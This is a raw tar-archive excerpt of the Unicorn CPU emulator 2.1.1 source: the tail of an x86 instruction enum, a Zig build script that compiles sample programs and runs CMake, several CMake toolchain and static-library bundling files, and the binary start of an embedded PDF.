1000, X86_INS_VPBLENDMQ = 1001, X86_INS_VPBLENDMW = 1002, X86_INS_VPBLENDVB = 1003, X86_INS_VPBLENDW = 1004, X86_INS_VPBROADCASTB = 1005, X86_INS_VPBROADCASTD = 1006, X86_INS_VPBROADCASTMB2Q = 1007, X86_INS_VPBROADCASTMW2D = 1008, X86_INS_VPBROADCASTQ = 1009, X86_INS_VPBROADCASTW = 1010, X86_INS_VPCLMULQDQ = 1011, X86_INS_VPCMOV = 1012, X86_INS_VPCMPB = 1013, X86_INS_VPCMPD = 1014, X86_INS_VPCMPEQB = 1015, X86_INS_VPCMPEQD = 1016, X86_INS_VPCMPEQQ = 1017, X86_INS_VPCMPEQW = 1018, X86_INS_VPCMPESTRI = 1019, X86_INS_VPCMPESTRM = 1020, X86_INS_VPCMPGTB = 1021, X86_INS_VPCMPGTD = 1022, X86_INS_VPCMPGTQ = 1023, X86_INS_VPCMPGTW = 1024, X86_INS_VPCMPISTRI = 1025, X86_INS_VPCMPISTRM = 1026, X86_INS_VPCMPQ = 1027, X86_INS_VPCMPUB = 1028, X86_INS_VPCMPUD = 1029, X86_INS_VPCMPUQ = 1030, X86_INS_VPCMPUW = 1031, X86_INS_VPCMPW = 1032, X86_INS_VPCOMB = 1033, X86_INS_VPCOMD = 1034, X86_INS_VPCOMPRESSD = 1035, X86_INS_VPCOMPRESSQ = 1036, X86_INS_VPCOMQ = 1037, X86_INS_VPCOMUB = 1038, X86_INS_VPCOMUD = 1039, X86_INS_VPCOMUQ = 1040, X86_INS_VPCOMUW = 1041, X86_INS_VPCOMW = 1042, X86_INS_VPCONFLICTD = 1043, X86_INS_VPCONFLICTQ = 1044, X86_INS_VPERM2F128 = 1045, X86_INS_VPERM2I128 = 1046, X86_INS_VPERMD = 1047, X86_INS_VPERMI2D = 1048, X86_INS_VPERMI2PD = 1049, X86_INS_VPERMI2PS = 1050, X86_INS_VPERMI2Q = 1051, X86_INS_VPERMIL2PD = 1052, X86_INS_VPERMIL2PS = 1053, X86_INS_VPERMILPD = 1054, X86_INS_VPERMILPS = 1055, X86_INS_VPERMPD = 1056, X86_INS_VPERMPS = 1057, X86_INS_VPERMQ = 1058, X86_INS_VPERMT2D = 1059, X86_INS_VPERMT2PD = 1060, X86_INS_VPERMT2PS = 1061, X86_INS_VPERMT2Q = 1062, X86_INS_VPEXPANDD = 1063, X86_INS_VPEXPANDQ = 1064, X86_INS_VPEXTRB = 1065, X86_INS_VPEXTRD = 1066, X86_INS_VPEXTRQ = 1067, X86_INS_VPEXTRW = 1068, X86_INS_VPGATHERDD = 1069, X86_INS_VPGATHERDQ = 1070, X86_INS_VPGATHERQD = 1071, X86_INS_VPGATHERQQ = 1072, X86_INS_VPHADDBD = 1073, X86_INS_VPHADDBQ = 1074, X86_INS_VPHADDBW = 1075, X86_INS_VPHADDDQ = 1076, X86_INS_VPHADDD = 1077, X86_INS_VPHADDSW = 1078, X86_INS_VPHADDUBD = 1079, X86_INS_VPHADDUBQ = 1080, X86_INS_VPHADDUBW = 1081, X86_INS_VPHADDUDQ = 1082, X86_INS_VPHADDUWD = 1083, X86_INS_VPHADDUWQ = 1084, X86_INS_VPHADDWD = 1085, X86_INS_VPHADDWQ = 1086, X86_INS_VPHADDW = 1087, X86_INS_VPHMINPOSUW = 1088, X86_INS_VPHSUBBW = 1089, X86_INS_VPHSUBDQ = 1090, X86_INS_VPHSUBD = 1091, X86_INS_VPHSUBSW = 1092, X86_INS_VPHSUBWD = 1093, X86_INS_VPHSUBW = 1094, X86_INS_VPINSRB = 1095, X86_INS_VPINSRD = 1096, X86_INS_VPINSRQ = 1097, X86_INS_VPINSRW = 1098, X86_INS_VPLZCNTD = 1099, X86_INS_VPLZCNTQ = 1100, X86_INS_VPMACSDD = 1101, X86_INS_VPMACSDQH = 1102, X86_INS_VPMACSDQL = 1103, X86_INS_VPMACSSDD = 1104, X86_INS_VPMACSSDQH = 1105, X86_INS_VPMACSSDQL = 1106, X86_INS_VPMACSSWD = 1107, X86_INS_VPMACSSWW = 1108, X86_INS_VPMACSWD = 1109, X86_INS_VPMACSWW = 1110, X86_INS_VPMADCSSWD = 1111, X86_INS_VPMADCSWD = 1112, X86_INS_VPMADDUBSW = 1113, X86_INS_VPMADDWD = 1114, X86_INS_VPMASKMOVD = 1115, X86_INS_VPMASKMOVQ = 1116, X86_INS_VPMAXSB = 1117, X86_INS_VPMAXSD = 1118, X86_INS_VPMAXSQ = 1119, X86_INS_VPMAXSW = 1120, X86_INS_VPMAXUB = 1121, X86_INS_VPMAXUD = 1122, X86_INS_VPMAXUQ = 1123, X86_INS_VPMAXUW = 1124, X86_INS_VPMINSB = 1125, X86_INS_VPMINSD = 1126, X86_INS_VPMINSQ = 1127, X86_INS_VPMINSW = 1128, X86_INS_VPMINUB = 1129, X86_INS_VPMINUD = 1130, X86_INS_VPMINUQ = 1131, X86_INS_VPMINUW = 1132, X86_INS_VPMOVDB = 1133, X86_INS_VPMOVDW = 1134, X86_INS_VPMOVM2B = 1135, X86_INS_VPMOVM2D = 1136, X86_INS_VPMOVM2Q = 1137, X86_INS_VPMOVM2W = 1138, X86_INS_VPMOVMSKB = 1139, X86_INS_VPMOVQB = 1140, X86_INS_VPMOVQD = 1141, X86_INS_VPMOVQW = 1142, X86_INS_VPMOVSDB = 1143, X86_INS_VPMOVSDW = 1144, X86_INS_VPMOVSQB = 1145, X86_INS_VPMOVSQD = 1146, X86_INS_VPMOVSQW = 1147, X86_INS_VPMOVSXBD = 1148, X86_INS_VPMOVSXBQ = 1149, X86_INS_VPMOVSXBW = 1150, X86_INS_VPMOVSXDQ = 1151, X86_INS_VPMOVSXWD = 1152, X86_INS_VPMOVSXWQ = 1153, X86_INS_VPMOVUSDB = 1154, X86_INS_VPMOVUSDW = 1155, X86_INS_VPMOVUSQB = 1156, X86_INS_VPMOVUSQD = 1157, X86_INS_VPMOVUSQW = 1158, X86_INS_VPMOVZXBD = 1159, X86_INS_VPMOVZXBQ = 1160, X86_INS_VPMOVZXBW = 1161, X86_INS_VPMOVZXDQ = 1162, X86_INS_VPMOVZXWD = 1163, X86_INS_VPMOVZXWQ = 1164, X86_INS_VPMULDQ = 1165, X86_INS_VPMULHRSW = 1166, X86_INS_VPMULHUW = 1167, X86_INS_VPMULHW = 1168, X86_INS_VPMULLD = 1169, X86_INS_VPMULLQ = 1170, X86_INS_VPMULLW = 1171, X86_INS_VPMULUDQ = 1172, X86_INS_VPORD = 1173, X86_INS_VPORQ = 1174, X86_INS_VPOR = 1175, X86_INS_VPPERM = 1176, X86_INS_VPROTB = 1177, X86_INS_VPROTD = 1178, X86_INS_VPROTQ = 1179, X86_INS_VPROTW = 1180, X86_INS_VPSADBW = 1181, X86_INS_VPSCATTERDD = 1182, X86_INS_VPSCATTERDQ = 1183, X86_INS_VPSCATTERQD = 1184, X86_INS_VPSCATTERQQ = 1185, X86_INS_VPSHAB = 1186, X86_INS_VPSHAD = 1187, X86_INS_VPSHAQ = 1188, X86_INS_VPSHAW = 1189, X86_INS_VPSHLB = 1190, X86_INS_VPSHLD = 1191, X86_INS_VPSHLQ = 1192, X86_INS_VPSHLW = 1193, X86_INS_VPSHUFB = 1194, X86_INS_VPSHUFD = 1195, X86_INS_VPSHUFHW = 1196, X86_INS_VPSHUFLW = 1197, X86_INS_VPSIGNB = 1198, X86_INS_VPSIGND = 1199, X86_INS_VPSIGNW = 1200, X86_INS_VPSLLDQ = 1201, X86_INS_VPSLLD = 1202, X86_INS_VPSLLQ = 1203, X86_INS_VPSLLVD = 1204, X86_INS_VPSLLVQ = 1205, X86_INS_VPSLLW = 1206, X86_INS_VPSRAD = 1207, X86_INS_VPSRAQ = 1208, X86_INS_VPSRAVD = 1209, X86_INS_VPSRAVQ = 1210, X86_INS_VPSRAW = 1211, X86_INS_VPSRLDQ = 1212, X86_INS_VPSRLD = 1213, X86_INS_VPSRLQ = 1214, X86_INS_VPSRLVD = 1215, X86_INS_VPSRLVQ = 1216, X86_INS_VPSRLW = 1217, X86_INS_VPSUBB = 1218, X86_INS_VPSUBD = 1219, X86_INS_VPSUBQ = 1220, X86_INS_VPSUBSB = 1221, X86_INS_VPSUBSW = 1222, X86_INS_VPSUBUSB = 1223, X86_INS_VPSUBUSW = 1224, X86_INS_VPSUBW = 1225, X86_INS_VPTESTMD = 1226, X86_INS_VPTESTMQ = 1227, X86_INS_VPTESTNMD = 1228, X86_INS_VPTESTNMQ = 1229, X86_INS_VPTEST = 1230, X86_INS_VPUNPCKHBW = 1231, X86_INS_VPUNPCKHDQ = 1232, X86_INS_VPUNPCKHQDQ = 1233, X86_INS_VPUNPCKHWD = 1234, X86_INS_VPUNPCKLBW = 1235, X86_INS_VPUNPCKLDQ = 1236, X86_INS_VPUNPCKLQDQ = 1237, X86_INS_VPUNPCKLWD = 1238, X86_INS_VPXORD = 1239, X86_INS_VPXORQ = 1240, X86_INS_VPXOR = 1241, X86_INS_VRCP14PD = 1242, X86_INS_VRCP14PS = 1243, X86_INS_VRCP14SD = 1244, X86_INS_VRCP14SS = 1245, X86_INS_VRCP28PD = 1246, X86_INS_VRCP28PS = 1247, X86_INS_VRCP28SD = 1248, X86_INS_VRCP28SS = 1249, X86_INS_VRCPPS = 1250, X86_INS_VRCPSS = 1251, X86_INS_VRNDSCALEPD = 1252, X86_INS_VRNDSCALEPS = 1253, X86_INS_VRNDSCALESD = 1254, X86_INS_VRNDSCALESS = 1255, X86_INS_VROUNDPD = 1256, X86_INS_VROUNDPS = 1257, X86_INS_VROUNDSD = 1258, X86_INS_VROUNDSS = 1259, X86_INS_VRSQRT14PD = 1260, X86_INS_VRSQRT14PS = 1261, X86_INS_VRSQRT14SD = 1262, X86_INS_VRSQRT14SS = 1263, X86_INS_VRSQRT28PD = 1264, X86_INS_VRSQRT28PS = 1265, X86_INS_VRSQRT28SD = 1266, X86_INS_VRSQRT28SS = 1267, X86_INS_VRSQRTPS = 1268, X86_INS_VRSQRTSS = 1269, X86_INS_VSCATTERDPD = 1270, X86_INS_VSCATTERDPS = 1271, X86_INS_VSCATTERPF0DPD = 1272, X86_INS_VSCATTERPF0DPS = 1273, X86_INS_VSCATTERPF0QPD = 1274, X86_INS_VSCATTERPF0QPS = 1275, X86_INS_VSCATTERPF1DPD = 1276, X86_INS_VSCATTERPF1DPS = 1277, X86_INS_VSCATTERPF1QPD = 1278, X86_INS_VSCATTERPF1QPS = 1279, X86_INS_VSCATTERQPD = 1280, X86_INS_VSCATTERQPS = 1281, X86_INS_VSHUFPD = 1282, X86_INS_VSHUFPS = 1283, X86_INS_VSQRTPD = 1284, X86_INS_VSQRTPS = 1285, X86_INS_VSQRTSD = 1286, X86_INS_VSQRTSS = 1287, X86_INS_VSTMXCSR = 1288, X86_INS_VSUBPD = 1289, X86_INS_VSUBPS = 1290, X86_INS_VSUBSD = 1291, X86_INS_VSUBSS = 1292, X86_INS_VTESTPD = 1293, X86_INS_VTESTPS = 1294, X86_INS_VUNPCKHPD = 1295, X86_INS_VUNPCKHPS = 1296, X86_INS_VUNPCKLPD = 1297, X86_INS_VUNPCKLPS = 1298, X86_INS_VZEROALL = 1299, X86_INS_VZEROUPPER = 1300, X86_INS_WAIT = 1301, X86_INS_WBINVD = 1302, X86_INS_WRFSBASE = 1303, X86_INS_WRGSBASE = 1304, X86_INS_WRMSR = 1305, X86_INS_XABORT = 1306, X86_INS_XACQUIRE = 1307, X86_INS_XBEGIN = 1308, X86_INS_XCHG = 1309, X86_INS_XCRYPTCBC = 1310, X86_INS_XCRYPTCFB = 1311, X86_INS_XCRYPTCTR = 1312, X86_INS_XCRYPTECB = 1313, X86_INS_XCRYPTOFB = 1314, X86_INS_XEND = 1315, X86_INS_XGETBV = 1316, X86_INS_XLATB = 1317, X86_INS_XRELEASE = 1318, X86_INS_XRSTOR = 1319, X86_INS_XRSTOR64 = 1320, X86_INS_XRSTORS = 1321, X86_INS_XRSTORS64 = 1322, X86_INS_XSAVE = 1323, X86_INS_XSAVE64 = 1324, X86_INS_XSAVEC = 1325, X86_INS_XSAVEC64 = 1326, X86_INS_XSAVEOPT = 1327, X86_INS_XSAVEOPT64 = 1328, X86_INS_XSAVES = 1329, X86_INS_XSAVES64 = 1330, X86_INS_XSETBV = 1331, X86_INS_XSHA1 = 1332, X86_INS_XSHA256 = 1333, X86_INS_XSTORE = 1334, X86_INS_XTEST = 1335, X86_INS_FDISI8087_NOP = 1336, X86_INS_FENI8087_NOP = 1337, X86_INS_ENDING = 1338, }; ������������unicorn-2.1.1/build.zig�����������������������������������������������������������������������������0000664�0000000�0000000�00000022270�14675241067�0015021�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������//! License: GNU GENERAL PUBLIC LICENSE Version 2 const std = @import("std"); const MIN_ZIG_VERSION: []const u8 = "0.13.0"; const MIN_ZIG_VERSION_ERR_MSG = "Please! Update zig toolchain to >= v" ++ MIN_ZIG_VERSION; const SampleFileTypes = enum { c, cpp, zig, }; const SampleDescripton = struct { file_type: SampleFileTypes, root_file_path: []const u8, }; /// Create a module for the Zig Bindings /// /// This will also get exported as a library that other zig projects can use /// as a dependency via the zig build system. fn create_unicorn_sys(b: *std.Build, target: std.Build.ResolvedTarget, optimize: std.builtin.OptimizeMode) *std.Build.Module { const unicorn_sys = b.addModule("unicorn-sys", .{ .target = target, .optimize = optimize, .root_source_file = b.path("bindings/zig/unicorn/unicorn.zig"), }); // link libc unicorn_sys.link_libc = true; // we need the c header for the zig-bindings unicorn_sys.addIncludePath(b.path("include")); unicorn_sys.addLibraryPath(b.path("build")); // Linking to the Unicorn library if (target.result.abi == .msvc and target.result.os.tag == .windows) { unicorn_sys.linkSystemLibrary("unicorn.dll", .{}); } else { unicorn_sys.linkSystemLibrary("unicorn", .{}); } return unicorn_sys; } // Although this function looks imperative, note that its job is to // declaratively construct a build graph that will be executed by an external // runner. pub fn build(b: *std.Build) void { if (comptime !checkVersion()) @compileError(MIN_ZIG_VERSION_ERR_MSG); // Standard target options allows the person running `zig build` to choose // what target to build for. Here we do not override the defaults, which // means any target is allowed, and the default is native. Other options // for restricting supported target set are available. const target = b.standardTargetOptions(.{}); // Standard optimization options allow the person running `zig build` to select // between Debug, ReleaseSafe, ReleaseFast, and ReleaseSmall. Here we do not // set a preferred release mode, allowing the user to decide how to optimize. const optimize = b.standardOptimizeOption(.{}); // Give the user the options to perform the cmake build in parallel or not // (eg. ci on macos will fail if parallel is enabled) // // flag: -Dparallel=true/false const parallel_cmake = b.option(bool, "parallel", "Enable parallel cmake build") orelse true; // flag: -DSamples=True/False const samples = b.option(bool, "Samples", "Build all Samples [default: true]") orelse true; const sample_bins = [_]SampleDescripton{ .{ .file_type = .zig, .root_file_path = "bindings/zig/sample/sample_riscv_zig.zig" }, .{ .file_type = .c, .root_file_path = "samples/sample_arm.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_arm64.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_ctl.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_batch_reg.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_m68k.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_riscv.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_sparc.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_s390x.c" }, .{ .file_type = .c, .root_file_path = "samples/shellcode.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_tricore.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_x86.c" }, .{ .file_type = .c, .root_file_path = "samples/sample_x86_32_gdt_and_seg_regs.c" }, }; // make a module for Zig Bindings const unicorn_sys = create_unicorn_sys(b, target, optimize); // Build Samples if (samples) { for (sample_bins) |sample| { const sample_bin = buildExe(b, .{ .target = target, .optimize = optimize, .filetype = sample.file_type, .filepath = sample.root_file_path, }); // import the unicorn sys module if this is a zig build if (sample.file_type == .zig) { sample_bin.root_module.addImport("unicorn", unicorn_sys); } } } // CMake Build const cmake = cmakeBuild(b, parallel_cmake); const cmake_step = b.step("cmake", "Run cmake build"); cmake_step.dependOn(&cmake.step); } fn buildExe(b: *std.Build, info: BuildInfo) *std.Build.Step.Compile { const target = info.stdTarget(); const execonfig: std.Build.ExecutableOptions = switch (info.filetype) { .c, .cpp => .{ .name = info.filename(), .target = info.target, .optimize = info.optimize, }, else => .{ .name = info.filename(), .target = info.target, .optimize = info.optimize, .root_source_file = b.path(info.filepath), }, }; const exe = b.addExecutable(execonfig); if (info.filetype != .zig) { exe.addCSourceFile(.{ .file = b.path(info.filepath), .flags = &.{ "-Wall", "-Werror", "-fno-sanitize=all", "-Wshadow", }, }); // Ensure the C headers are available exe.addIncludePath(b.path("include")); // Ensure the C library is available exe.addLibraryPath(b.path("build")); // linking to OS-LibC or static-linking for: // Musl(Linux) [e.g: -Dtarget=native-linux-musl] // MinGW(Windows) [e.g: -Dtarget=native-windows-gnu (default)] if (info.filetype == .cpp and target.abi != .msvc) exe.linkLibCpp() // static-linking LLVM-libcxx (all targets) + libC else exe.linkLibC(); // Now link the C library if (target.abi == .msvc and target.os.tag == .windows) { exe.linkSystemLibrary("unicorn.dll"); } else exe.linkSystemLibrary("unicorn"); } // Linking to the Unicorn library if (target.abi == .msvc and target.os.tag == .windows) { exe.want_lto = false; } // This declares intent for the executable to be installed into the // standard location when the user invokes the "install" step (the default // step when running `zig build`). b.installArtifact(exe); // This *creates* a RunStep in the build graph, to be executed when another // step is evaluated that depends on it. The next line below will establish // such a dependency. const run_cmd = b.addRunArtifact(exe); // By making the run step depend on the install step, it will be run from the // installation directory rather than directly from within the cache directory. // This is not necessary, however, if the application depends on other installed // files, this ensures they will be present and in the expected location. run_cmd.step.dependOn(b.getInstallStep()); // This allows the user to pass arguments to the application in the build // command itself, like this: `zig build run -- arg1 arg2 etc` if (b.args) |args| { run_cmd.addArgs(args); } // This creates a build step. It will be visible in the `zig build --help` menu, // and can be selected like this: `zig build run` // This will evaluate the `run` step rather than the default, which is "install". const run_step = b.step(info.filename(), b.fmt("Run the {s}.", .{info.filename()})); run_step.dependOn(&run_cmd.step); return exe; } const PARALLEL_CMAKE_COMMAND = [_][]const u8{ "cmake", "--build", "build", "--config", "release", "--parallel", }; const SINGLE_CMAKE_COMMAND = [_][]const u8{ "cmake", "--build", "build", "--config", "release", }; fn cmakeBuild(b: *std.Build, parallel_cmake: bool) *std.Build.Step.Run { const preconf = b.addSystemCommand(&.{ "cmake", "-B", "build", "-DZIG_BUILD=ON", "-DUNICORN_BUILD_TESTS=OFF", "-DUNICORN_INSTALL=OFF", "-DCMAKE_BUILD_TYPE=Release", }); // build in parallel if requested const cmakebuild = b.addSystemCommand(blk: { if (parallel_cmake) { break :blk &PARALLEL_CMAKE_COMMAND; } else { break :blk &SINGLE_CMAKE_COMMAND; } }); cmakebuild.step.dependOn(&preconf.step); return cmakebuild; } // ensures the currently in-use zig version is at least the minimum required fn checkVersion() bool { const builtin = @import("builtin"); if (!@hasDecl(builtin, "zig_version")) { return false; } const needed_version = std.SemanticVersion.parse(MIN_ZIG_VERSION) catch unreachable; const version = builtin.zig_version; const order = version.order(needed_version); return order != .lt; } const BuildInfo = struct { filepath: []const u8, filetype: SampleFileTypes, target: std.Build.ResolvedTarget, optimize: std.builtin.OptimizeMode, fn filename(self: BuildInfo) []const u8 { var split = std.mem.splitSequence(u8, std.fs.path.basename(self.filepath), "."); return split.first(); } fn stdTarget(self: *const BuildInfo) std.Target { return self.target.result; } }; ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/build.zig.zon�������������������������������������������������������������������������0000664�0000000�0000000�00000000110�14675241067�0015613�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������.{ .name = "unicorn", .version = "2.1.1", .paths = .{""}, } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/cmake/��������������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014264�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/cmake/bundle_static.cmake�������������������������������������������������������������0000664�0000000�0000000�00000010207�14675241067�0020106�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# https://cristianadam.eu/20190501/bundling-together-static-libraries-with-cmake/ function(bundle_static_library tgt_name bundled_tgt_name library_name) list(APPEND static_libs ${tgt_name}) set(dep_libs "") function(_recursively_collect_dependencies input_target) set(_input_link_libraries LINK_LIBRARIES) get_target_property(_input_type ${input_target} TYPE) if (${_input_type} STREQUAL "INTERFACE_LIBRARY") set(_input_link_libraries INTERFACE_LINK_LIBRARIES) endif() get_target_property(public_dependencies ${input_target} ${_input_link_libraries}) foreach(dependency IN LISTS public_dependencies) if(TARGET ${dependency}) get_target_property(alias ${dependency} ALIASED_TARGET) if (TARGET ${alias}) set(dependency ${alias}) endif() get_target_property(_type ${dependency} TYPE) if (${_type} STREQUAL "STATIC_LIBRARY") list(APPEND static_libs ${dependency}) endif() get_property(library_already_added GLOBAL PROPERTY _${tgt_name}_static_bundle_${dependency}) if (NOT library_already_added) set_property(GLOBAL PROPERTY _${tgt_name}_static_bundle_${dependency} ON) _recursively_collect_dependencies(${dependency}) endif() elseif(dependency) list(APPEND dep_libs ${dependency}) endif() endforeach() set(static_libs ${static_libs} PARENT_SCOPE) set(dep_libs ${dep_libs} PARENT_SCOPE) endfunction() _recursively_collect_dependencies(${tgt_name}) list(REMOVE_DUPLICATES static_libs) list(REMOVE_DUPLICATES dep_libs) set(bundled_tgt_full_name ${CMAKE_BINARY_DIR}/${CMAKE_STATIC_LIBRARY_PREFIX}${library_name}${CMAKE_STATIC_LIBRARY_SUFFIX}) if (APPLE) find_program(lib_tool libtool REQUIRED) foreach(tgt IN LISTS static_libs) list(APPEND static_libs_full_names $<TARGET_FILE:${tgt}>) endforeach() add_custom_command( COMMAND ${lib_tool} -static -o ${bundled_tgt_full_name} ${static_libs_full_names} OUTPUT ${bundled_tgt_full_name} COMMENT "Bundling ${bundled_tgt_name}" VERBATIM) elseif(UNIX OR MINGW) file(WRITE ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in "CREATE ${bundled_tgt_full_name}\n" ) foreach(tgt IN LISTS static_libs) file(APPEND ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in "ADDLIB $<TARGET_FILE:${tgt}>\n") endforeach() file(APPEND ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in "SAVE\n") file(APPEND ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in "END\n") file(GENERATE OUTPUT ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar INPUT ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar.in) set(ar_tool ${CMAKE_AR}) if (CMAKE_INTERPROCEDURAL_OPTIMIZATION) set(ar_tool ${CMAKE_CXX_COMPILER_AR}) endif() add_custom_command( COMMAND ${ar_tool} -M < ${CMAKE_BINARY_DIR}/${bundled_tgt_name}.ar OUTPUT ${bundled_tgt_full_name} COMMENT "Bundling ${bundled_tgt_name}" VERBATIM) elseif(WIN32) # https://stackoverflow.com/a/38096930/1806760 get_filename_component(vs_bin_path "${CMAKE_LINKER}" DIRECTORY) find_program(lib_tool lib HINTS "${vs_bin_path}" REQUIRED) foreach(tgt IN LISTS static_libs) list(APPEND static_libs_full_names $<TARGET_FILE:${tgt}>) endforeach() add_custom_command( COMMAND ${lib_tool} /NOLOGO /OUT:${bundled_tgt_full_name} ${static_libs_full_names} OUTPUT ${bundled_tgt_full_name} COMMENT "Bundling ${bundled_tgt_name}" VERBATIM) else() message(FATAL_ERROR "Unknown bundle scenario!") endif() add_custom_target(bundling_target ALL DEPENDS ${bundled_tgt_full_name}) add_dependencies(bundling_target ${tgt_name}) add_library(${bundled_tgt_name} STATIC IMPORTED) set_target_properties(${bundled_tgt_name} PROPERTIES IMPORTED_LOCATION ${bundled_tgt_full_name} INTERFACE_INCLUDE_DIRECTORIES $<TARGET_PROPERTY:${tgt_name},INTERFACE_INCLUDE_DIRECTORIES> INTERFACE_LINK_LIBRARIES "${dep_libs}") #IMPORTED_LINK_INTERFACE_LIBRARIES "${dep_libs}") # Deprecated add_dependencies(${bundled_tgt_name} bundling_target) endfunction()�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/cmake/mingw-w64.cmake�����������������������������������������������������������������0000664�0000000�0000000�00000001113�14675241067�0017021�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# cross compile SET(CMAKE_SYSTEM_NAME Windows) # set the compiler SET(CMAKE_C_COMPILER x86_64-w64-mingw32-gcc) SET(CMAKE_CXX_COMPILER x86_64-w64-mingw32-g++) SET(CMAKE_RC_COMPILER x86_64-w64-mingw32-windres) # set the compiler search path SET(CMAKE_FIND_ROOT_PATH /usr/x86_64-w64-mingw32) # adjust the default behaviour of the FIND_XXX() commands: # search headers and libraries in the target environment, search # programs in the host environment set(CMAKE_FIND_ROOT_PATH_MODE_PROGRAM NEVER) set(CMAKE_FIND_ROOT_PATH_MODE_LIBRARY ONLY) set(CMAKE_FIND_ROOT_PATH_MODE_INCLUDE ONLY) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/cmake/zig.cmake�����������������������������������������������������������������������0000664�0000000�0000000�00000000417�14675241067�0016061�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������set(CMAKE_CROSSCOMPILING TRUE) # set the compiler if(WIN32) SET(ZIG_CC ${CMAKE_SOURCE_DIR}/bindings/zig/tools/zigcc.cmd) else() SET(ZIG_CC ${CMAKE_SOURCE_DIR}/bindings/zig/tools/zigcc.sh) endif() SET(CMAKE_C_COMPILER_ID ${ZIG_CC}) SET(CMAKE_C_COMPILER ${ZIG_CC}) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/���������������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014134�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/BHUSA2015-unicorn.pdf������������������������������������������������������������0000664�0000000�0000000�00002734163�14675241067�0017474�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������%PDF-1.5 % 10 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 11 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 13 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 14 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 15 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 16 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 17 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 18 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 23 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 24 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 26 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 27 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 29 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 30 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 32 0 obj << /Type /XObject /Subtype /Form /BBox [0 0 100 100] /FormType 1 /Matrix [1 0 0 1 0 0] /Resources 33 0 R /Length 15 /Filter /FlateDecode >> stream xP(� endstream endobj 78 0 obj << /Length 655 /Filter /FlateDecode >> stream xUKo@WіfZ8D$`qTcz6MHgvgp].pC e$sJ il;@? Uk|۫q-ΑGQ@(a`5ǓPr)S0ř e0oѴϖQ'"*cT8Ulj.e@B=_dyyJ颹O [9[X,7ɧ*u0g{�y˸ü1hZP*,e(b66|FY洣gƣ1U":*I8k~(Q I"߲r.DX -0~tIh<"7YYՋ`hH>Dφ=՞&b^k 6|j8rC͏^uLr|tL 1U-p0ڧ55.RDž%>]꼮9=< i-NQ6wy~^zgA3o ͏&d>B( &Ц<S}ߩPX/:-}ǡ"V6o*9mP>JƓ"GU3/zS1uUdSړiشFi$msOBO8jiÖPQIP܎?J endstream endobj 74 0 obj << /Type /XObject /Subtype /Image /Width 411 /Height 422 /BitsPerComponent 8 /ColorSpace /DeviceRGB /SMask 86 0 R /Length 19833 /Filter /FlateDecode >> stream 